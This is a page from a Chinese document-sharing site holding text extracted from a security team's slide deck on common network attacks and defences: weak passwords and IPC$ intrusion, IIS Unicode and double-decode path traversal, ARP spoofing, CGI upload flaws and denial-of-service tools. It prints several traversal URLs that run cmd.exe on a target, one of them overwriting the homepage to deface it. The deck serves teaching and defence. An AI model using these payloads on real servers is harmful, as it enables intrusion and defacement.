欢迎来到天天文库
浏览记录
ID:38299500
大小:501.00 KB
页数:19页
时间:2019-06-08
《常见的攻击和防范》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、常见的攻击和防范蓝盾安全小组前言:在网络这个不断更新换代的世界里,网络中的安全漏洞无处不在。即便旧的安全漏洞补上了,新的安全漏洞又将不断涌现。网络攻击正是利用这些存在的漏洞和安全缺陷对系统和资源进行攻击。蓝盾安全小组蓝盾安全小组蓝盾安全小组一、常见攻击方法1、弱口令和IPC入侵IPC是指“InterProcessCommunications”,准确的说是ipc$,是默认的在系统启动时的admin共享。(1)操作系统默认用户如:GUEST、IWAM_DAMU12A5UQCWDJL(2)应用软件默认用户如:SQL的SU用户蓝盾安
2、全小组蓝盾安全小组二、UNICODE漏洞UNICODE漏洞是经常被入侵者利用的漏洞之一。在2001年5月1日黑客大战中,黑客们就普遍利用此漏洞对各国网站进行攻击。蓝盾安全小组黑客可以远程通过IIS执行以下命令,列出指定URL中C:盘根目录下的所有内容。http://www.target.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:+/a或http://www.target.com/scripts/..%c1%9c../winnt/system32/cmd.
3、exe?/c+dir+c:+/a通过相关的操作查得该主机WEB页为:c:inetpubwwwrootdefault.htm蓝盾安全小组下一步是修改主页:http://targetip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hacked+by+qting+>+c:inetpubwwwrootdefault.htm.修改页面完成,首页改为:hackedbyqting解决办法:A、及时的装补丁B、关闭没用到的端口蓝盾安全小组IISunicode漏洞:/sc
4、ripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2f/winnt/system32/cmd.exe?/c%20dir%20C:/scripts/check.bat/..%c1%1c..%c1%1c..%c1%
5、1c/winnt/system32/cmd.exe?/c%20dir%20C:IISCGI文件名二次解码漏洞:/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir蓝盾安全小组3、ARP欺骗ARP协议是“AddressResolutionProtoc
6、ol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。IP地址<--->MAC地址逻辑地址 物理地址蓝盾安全小组蓝盾安全小组Internet192.168.0.3被投入ARP欺骗木马3、CGI漏洞攻击如:UPLOADER.EXE如果使用WINNT作为WEBSERVER的操作系统,入侵者能够利用UPLOADER.EXE上传任何文件。解决方法:将UPLOADER.EXE从WEB目录移走或删除。蓝盾
7、安全小组4、拒绝服务攻击拒绝服务攻击是一种遍布全球的系统漏洞,黑客们正醉心于对它的研究,而无数的网络用户将成为这种攻击的受害者。TribeFloodNetwork,tfn2k,smurf,targa…还有许多的程序都在被不断的开发出来。蓝盾安全小组蓝盾安全小组目标主机国内黑客台湾个人电脑(跳板)-----------------------------------------------------攻击方式的分类后门攻击拒绝服务攻击分布式拒绝服务攻击扫描攻击缓冲区溢出攻击远程过程调用攻击网络蠕虫病毒基于CGI的Web攻击基于
8、Frontpage的Web攻击基于IIS的Web攻击基于Coldfusion的Web攻击前导攻击ICMP攻击SMTP攻击其它攻击蓝盾安全小组
此文档下载收益归作者所有